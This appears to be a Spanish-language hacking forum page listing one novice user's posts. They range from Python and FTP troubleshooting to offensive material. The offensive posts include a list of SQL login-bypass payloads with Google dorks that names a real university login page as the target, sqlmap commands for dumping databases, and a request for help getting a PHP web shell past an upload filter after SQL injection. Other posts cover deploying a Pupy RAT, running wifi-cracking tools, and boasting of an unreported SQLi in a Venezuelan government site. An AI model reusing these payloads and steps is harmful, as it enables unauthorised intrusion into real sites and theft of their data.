Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - Assed [In]Seguridad Informática

Páginas: [1]
1
Dudas y pedidos generales / Python error.
« en: Marzo 11, 2016, 01:45:42 pm »
Buenas gente que tal aquí tengo un problema con python,lo cuál me genera un error al abrir un script desde la shell de windows.Pero desde la shell de python cuando lo ejecuto el script va 10 puntos!.

Bueno el problema es cuando escribo tan solo cualquier linea de codigo que sea sobre el lenguaje python me toma el siguiente error.


C:\Users\Alguien\Desktop>python
  File "C:\Users\Alguien\Desktop\python.py", line 1
SyntaxError: Non-ASCII character '\xc2' in file C:\Users\Alguien\Desktop\pytho
n.py on line 1, but no encoding declared; see http://python.org/dev/peps/pep-026
3/ for details

bueno eso es cuando lo quiero ejecutar desde la shell de windows 8.1.CMD.Cuando lo ejecuto desde la shell python,va sin problemas.


(Cuando lo ejecuto con el IDLE Python.... sin problemas...)

pero cuando lo ejecuto desde la shell de windows pasa ese error.Y cabe destacar que me instale el PentestBox,capaz muchos lo conoscan es un proyecto orientado al pentesting con windows y bueno en la shell del pentesbox cuando quiero ejecutar el python pasa exactamente lo mismo que comente arriba,es decir,esto:

C:\Users\Alguien\Desktop>python
  File "C:\Users\Alguien\Desktop\python.py", line 1
SyntaxError: Non-ASCII character '\xc2' in file C:\Users\Alguien\Desktop\pytho
n.py on line 1, but no encoding declared; see http://python.org/dev/peps/pep-026
3/ for details

 ;D,Espero que me puedan dar una manito con este problema.Saludos Foro!

2
Dudas y pedidos generales / [SOLUCIONADO] Upload Shell ayuda.
« en: Marzo 10, 2016, 02:49:26 pm »
buenas underc0de,hoy vengo con algo que es sí subir una shell...¿Pero cuál es mi problema?..Yo  para practicar tengo un servidor vulnerable a SQLi.Ya inyecte y estóy dentro del panel/login.php..

Me dirijo donde pueda subir la shell.Encuentro la parte para subir fotos y publicar cosas y bueno ahí le doy a browser y selecciono la shell.php.
¿Que pasa?.Basicamente me bloquea la shell así:

Security Alert

The file you are uploading was rejected by the server.
It probably contents viruses or trojans that can damage your website

Do not attempt to upload it again as your IP address may be blocked.

El archivo que subi fue bloqueado...Bueno no sé como hacer para que la tome y así buscarla y entrar a ella.
miré videos donde le cambian la extencion a .jpg.Pero yo se la cambio,le pongo .jpg y ahí la sube pero luego no logro encontrarla.
Si uno me da una mano se los agradeceria.

Un fuerte abrazo a toda la comunidad!

3
Hola que tal gente  de la comunidad.Hoy les vengo a contar un problema que antes no me pasaba y no se el porque de esto.

 Lo que me pasa es que cuando quiere subir archivos sean .html o entre otros a un servidor hosting gratuito como por ejemplo 000webhost,abro el FIleZIlla pero al momento de conectar sale que no es posible y estoy introduciendo todos los datos como corresponden.....
introdusco el server FTP,el nombre asignado por el servidor,y la contraseña pero sale que esta conectando...... y de repente...
Estado:   Conectando a 31.170.160.102:21...
Estado:   Conexión establecida, esperando el mensaje de bienvenida...
Estado:   Servidor no seguro, no soporta FTP sobre TLS.
Comando:   USER a7603709
Respuesta:   331 User a7603709 OK. Password required
Respuesta:   530 Login authentication failed
Error:   Critical error: No se pudo conectar al servidor (eso sale).
Al intentar en el file manager por el mismo host paso lo mismo no me mete adentro.

espero que me ayuden.Muchas gracias a todos por su tiempo.

4
Dudas y pedidos generales / Ayuda con Linset.
« en: Febrero 06, 2016, 01:30:21 pm »
Muy buenas a todos Underc0de,no sé si me puedan ayudar con esto,pero lo que pasa es que estoy intentando probar Linsent,esta herramienta para crackear alguna red wifi y probar.
¿Pero que pasa?
Al momento de ejecutar ./Linsent
carga todos los complementos pero hay algunos que no.Y ustedes me van a decir que los instale.Pero eso ya lo hice y son los siguientes :

apt-get install isc-dhcp-server

apt-get install Php5-cgi

apt-get install Hostapd

apt-get install Lighttpd

*supuestamente en la terminal sale que está todo bien,pero al momento de volver a iniciar Linset.
./Linset

Salta lo mismo....

También tengo un problema en la red y no se si tenga quer ver con Linset que es siguiente:
Yo en el sistema que estoy haciendo correr Linset es Kali Linux 2.0(esta virtualizado con virtualbox)
entonces como está en MODO NAT tengo red pero al momento de querer tener solo en la virtual no me deja...
Fui a
Dispositivos>USB>ATHEROS 2.0 (reinicio la maquina y nada)
no tengo internet pero cuando lo meto en NAT ahí si tengo.Entonces capaz es eso el problema de no poder usar Linset.
(recuerda el problema que les mencioné arriba de Linset)



*Algunas capturas:


RED EN MODO NAT (TENGO INTERNET)


RED EN ADAPTADOR PUENTE QUE SUPONGO QUE ES EN MODO BRIDGE + LA ATHEROS 2.0 ( NO TENGO INTERNET) (OBVIAMENTE SE VA EL INTERNET EN LA MAQUINA FISICA CON WINDOWS 8.1 PRO,PERO EN LA VIRTUAL SUPUESTAMENTE DETECTA PERO NO HAY RED...)

*instalacion de algunos complementos de Linset:



(instalación  del complemento isc-dhcp-server)nº1





(instalación del complemento   Php5-cgi   )nº2 



 (instalación del complemento Hostpad)nº3

 

(instalación del último complemento) nº 4

Resultado final de una vez instalado las herramientas que pide:



solo se instaló bien la nº1.

Bueno Underc0de hasta que llega mi problema,espero que me puedan dar una mano todos juntos aportando y ayudando.

(Disulpen por si tuve algunas faltas de ortografía lo escribí bastante rápido y no me puse a armar un texto bien desarrollado)
Saludos!

5
Dudas y pedidos generales / Duda Pupy R.A.T
« en: Enero 30, 2016, 02:16:17 pm »
Muy buenas tardes Underc0de,ayer se me dio por probar este R.A.T en la distribución para Kali Linux 2.0.Y bueno todo salió bien al momento de crear el archivo.exe,pero al momento de ejecutarlo en otro ordenador conectado en la misma RED me encontré que no conecta..

Puerto que abrí es el 4444.
myip:4444. lo abrí como tcp/udp.
(cabe decir que el anti-virus de esa maquina,conectada en la misma red donde configuré el rat,detecto el virus.exe,pero yo desactive el anti-virus y aun así no conectaba.
(También deshabilite el firewall del anti-virus y los mismo,no conectaba.)
(todo estaba en la escucha,pero al momento de abrir el exe no había clients..)
¿Puede ser que por estar en la misma red LAN no me haya infectado?
No lo sé..

Desde ya muchas gracias y espero sus comentarios. Hasta luego.
 

6
Dudas y pedidos generales / Ayuda con wifite en Kali Linux.
« en: Enero 27, 2016, 12:27:38 pm »
Hola que tal Underc0de, hoy aquí vengo a plantearles una duda con lo que ando teniendo con wifite,que es una herramienta para crackear contraseñas de wifi wap/wpa2,seguro muchos la conocerán.
Pero el tema en mí es que no me deja utilizarla y es por algo de la red(cabe destacar que tengo el sistema operativo Kali Linux en un maquina virtual).El software que uso para tener la maquina virtual es MVWARE Workstation y como les digo es un problema de la red que desconozco porque está todo bien instalado.(problema de la red de la maquina virtual,al menos pienso eso yo).

Pantallazo:


como ven me sale que tengo que instalar unos drivers pero no es,es algo de la red como digo yo.Pero para prooverles más información voy a sacar una captura de la configuración  que tengo en la red con la maquina virtual.

Settings:


a ver si alguien me puede ayudar, Saludos a todos y gracias por su Tiempo.
 ;)


7
Dudas y pedidos generales / Duda sobre python.
« en: Enero 24, 2016, 02:38:59 pm »
Hola UnderC0de,aquí una vez más vengo con una duda que es la siguiente:

Voy aprobar unas herramientas desarrolladas en el lenguaje de programación Python creadas por Veneno y me salta
estos errores de Syntax.




NO ES LA PRIMERA VEZ QUE ME PASA,ME HA PASADO TAMBIÉN CUANDO ESTOY LEYENDO SOBRE ESTE GRAN LENGUAJE DE ALTO NIVEL Y QUIERO COPIAR Y PEGAR EL CODE ME SALE LO MISMO.
(en Kali Linux no me ha saltado estos errores.
¿Que es lo que pasa?
Saludos!!!!!


8
Hola que tal a todos,bueno hoy vengo con una pregunta y antes de preguntarles pediré disculpas por mi ignorancia.
La pregunta es la siguiente:
Yo estoy aprendiendo Python pero en muchos libros donde leo me muestra matemáticas pero matemáticas que yo no manejo y en años superiores las manejaré (todavía no las vi y no estoy en ese nivel).
¿Es posible que desarrolle scripts "básicos"  y que sean útiles?

Simplemente es esa mi pregunta y espero una respuesta con respeto a mi pregunta.

Saludos comunidad UnderCode.

 ;)

Editado por Gabriela:
Por favor, poner títulos descriptivos del problema o pregunta, gracias.  :)

9
Manuales y libros / Manuales y Guias SQLI
« en: Agosto 25, 2013, 07:37:42 pm »
Holaa Underc0de acá les comparto otros pdfs ! sobre Manuales y Guias SQLI

Contenido:
Introducción a las inyección sqli
ejemplos! de ataques
Técnicas
SQLMAP(python xD lo pongo ya que esta desarrollado en python) 
y machas mas cosas

enlace : https://mega.co.nz/#F!KENU1TKa!cPgXu2g0FtB3zu2MJygpbw

espero que lo entiendan

PD: no soy el autor y no puedo poner todos los cerditos ya que cada pdf esta echo por distinto autor ! lo siento :l pero se les agradece   de todos modos ! !
y no me hago responsable con lo que aprendas y no hagan  cagadas con lo que aprenden leyendo 

Saludos !  :D

10
Manuales y libros / Pack de Manuales Mysql , Injection sql , xss ect
« en: Agosto 25, 2013, 12:53:06 pm »
hola que tal Underc0de hace mucho tenia en mi ordenador un pack de muchas cosas pero muchoo y lo fui leyendo !

Cosas que tiene el pack :
 sql Injection
cursos
cracking
BackTrack
Base de datos
Python
Programación !
y muchas cosas interesantes !!
tecnicas de inyeccion sql  y mucho !!

Espero que lo lean !

Enlace: https://mega.co.nz/#F!3Q02mTBK!XLI7uSfxOFBmDx82VV3aQQ!OV9m3YAY

PD : no soy el autor de estos documentos ! , no puedo dar los créditos ya que son muchos ducumentos echos por distinta gente pero se les agradece a los que lo hicieron

Saludos!!!!!!!   

11
Seguridad / Como descargar el Navegador de the pirate bay
« en: Agosto 21, 2013, 03:11:00 pm »
Hola Gente de Underc0de Bueno les traigo este navegador

Aquí una imagen :



Su descarga : http://cdn.piratebrowser.net/PirateBrowser_0.6b.exe


Una vez descargado lo ejecutan y lo descomprimen donde quieran 

acá una imagen



y ya lo tendrían instalado

pd: ¿Para que sirve? pues no se si es 'algo' parecido a tor pero nos deja navegar 'anonimamente '


Saludos !!!!!!!!

12
Pentesting / ¿Como Usar SQLMAP? Mini-Tutorial
« en: Agosto 01, 2013, 09:50:18 pm »
Hola Gente de Underc0de  ;D

¿Porque hago este tuto?

Bueno la verdad lo hago porque muchas personas tienen dudas : como? : ¿No lo se usar? , ¿No me abre?

Jjajaj cuando aveces tienen la duda de que no les abre es porque necesitan python , ya que la herramienta esa desarrollada en python


Seguir mis pasos ;)

1-Descargar python
PD: Si tienen windows , descargar la versión de python para windows 7 , o el que tengan xD

Acá un panta (mio :P)

Python :


Descargar:http://www.python.org/download/

2- El Sqlmap
Pagina Oficial : http://sqlmap.org/
PD: Es la oficial así que descarguen sin problem

Otro panta (mio :))


3- Cuando tengan Descargado todo Instalan el Python en el disco local C


no mía la imagen ;)

4-  y el sqlmap también copian y pegan en el disco local C

5- Esta es la parte que mas se equivocan porque algunos le pasa ¿Como lo abre?

Seguir mis pasos :

CMD
  (ABRIRLO)

Una vez abierto poner :

CD..
y otra vez CD.. y poner cd sqlmap

Imagen(mia)


Por ultimo
Tienen que hacer esto les dejos los comandos

COMANDOS :



1. sqlmap.py -u ((buee su : (la pagina)TARGET.ASSED.COMxD) --dbs

2. sqlmap.py -u ((buee su : (la pagina)TARGET.ASSED.COMxD) -D (Nombre de la BD) --tables

3. sqlmap.py -u (buee su : (la pagina)TARGET.ASSED.COMxD) -D (Nombre de la BD) -T (Nom. de la tabla) --columns

4. sqlmap.py -u (buee su : (la pagina)TARGET.ASSED.COMxD) -D (Nombre de la BD) -T (Nom. de la tabla) -C (Nom. de la columna) --dump


eso es todo Saludos !

PD: SIN LOS PARÉNTESIS AL PONER ;) ,es decir , -u ejemplo -dbs  (sqlmap.py)

13
Pentesting / [SQL] Bypass Admin Panel
« en: Julio 30, 2013, 11:58:38 pm »
Bueno como dice hoy are un tutorial sobre el bypass admin panel (SQL) ,es decir, bypasear  panel (admin)


algunos dorks


Dorks :


inurl:adminlogin.aspx
 inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp


lo aremos con una simple consulta SQL
,,,

Acá una imagen (mía)




algunos tipos de consultas :

‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –


Sitio que use de ejemplo : http://cpr.molsci.ucla.edu/cpr/cpr/login.asp

Bueno Un saludo Undercode  ;)

14
Hacking ShowOff / SQLi Gobierno De Venezuela
« en: Julio 30, 2013, 10:17:20 pm »
Hola Gente  :D Andando por ahi entre a la pagina del gob de Vene me puse a ver unas cosas y me tope

con una vulne SQLI

Reportada: No

Imagen :



pd: me la encontré googleando el sitio ese de vene (gob)


Salu2

15
Pentesting / Clases Inyeccion SQL Por Omar Palomino (SQLI)
« en: Julio 30, 2013, 07:47:10 pm »
Hola Underc0de Soy Nuevo en la comunidad , recién ando empezando  :) pero e aprendido poco a poco con temitas muy buenos que hay a qui en la comunidad

Bueno me vi una clases de SQL inyeccion son muy buenas las recomiendo


CLASE 1 :



1.- Concepto de SQLi (SQL Injection)
2.- Entender como funciona MySQL
3.- ¿Cómo identificar las inyecciones SQL?
- Concatenaciones
- Operadores matemáticos
- Errores
4.- Entendiendo los distintos tipos de sentencias SQL


Clase 2




1. Herramientas que nos ayudan a identificar SQLi
2. Obtener información a través de SQLi
3. Inyecciones basadas en UNIONES
- Obtener número columnas con ORDER BY: Búsqueda binaria
- Realizando la inyección con uniones
4. Funciones básicas de MySQL
- Función: Database, user, current_user, datadir
5. Funciones de concatenación: CONCAT, GROUP_CONCAT, CONCAT_WS
5. Analizando la base de datos: INFORMATION_SCHEMA

Clase 3 :



1. Obtener información(registros) de las Bases de Datos
2. Obtener información de la Base de Datos MYSQL
- Tabla User
- Doble SHA1, funcion password

3. Craking de contraseñas
- Rainbow tables
4. Ataques con SQLMAP

y por ultimo la clase 4

Clase 4 :


1. Desarrollo de script en python para automatizar SQLi <- este esta excelente  :)
2. Inyección de código en páginas web vulnerables

Bueno para los que no saben lo que es la inyeccion sql   
Buena la inyeccion sql  es un metodo de infiltracionn de codigo intruso que se vale de una vulnerabilidad informática presente en una aplicación en el nivel de validación de las entradas para realizar consultas a una base de datos.

Sal2
Espero que les guste

PD : SI NO TIENES MUCHA IDEA NO ENTENDERÁS LAS CLASES AL TOQUE CUANDO LAS VEAS , VELAS BARIAS VECES ;)

16
Hola que tal soy Assed
y soy un novato seguro muchos pasan por esto no me digan que no porque es verdad

Les pido si alguien me puede decir o integrar en el pentent

Desde ya gracias!!!!!!

Páginas: [1]